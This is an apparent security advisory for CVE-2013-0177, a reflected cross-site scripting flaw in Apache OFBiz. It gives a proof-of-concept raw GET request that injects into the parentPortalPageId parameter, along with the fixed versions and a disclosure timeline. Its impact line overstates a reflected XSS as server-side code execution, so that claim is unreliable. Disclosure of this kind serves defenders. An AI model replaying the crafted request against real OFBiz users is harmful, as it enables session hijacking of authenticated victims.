Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz Type: Remote Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb) CVE: CVE-2013-0177 Impact: Direct execution of arbitrary code in the context of Webserver user. Release Date: 18.01.2013 Summary ======= Apache Open For Business (Apache OFBiz) is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. Description =========== Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and Image.alt Widget attributes because the content of these two elements is not properly escaped. Vendor ====== Apache ofbiz - http://ofbiz.apache.org/ PoC === It is worth mentioning that originally the resource was using the HTTP method POST, but it was changed to GET to exploit it more easily. Something important to remark is that for this attack to work, the victim should be authenticated. Below you can see how the URL is specially crafted to expose the issue: Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages-> parameter: parentPortalPageId==[XSS] GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"> HTTP/1.1 Host: 10.10.10.14:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3 Connection: keep-alive Referer: https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037 Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002 Solution ======== 10.04.* users should upgrade to 10.04.05 11.04.01 users should upgrade to 11.04.02 Vendor Status ============= [08.01.2013] Vulnerability discovered. [09.01.2013] Vendor informed. [09.01.2013] Vendor replied. [12.01.2013] Vendor reveals patch release date. [18.01.2013] Public advisory.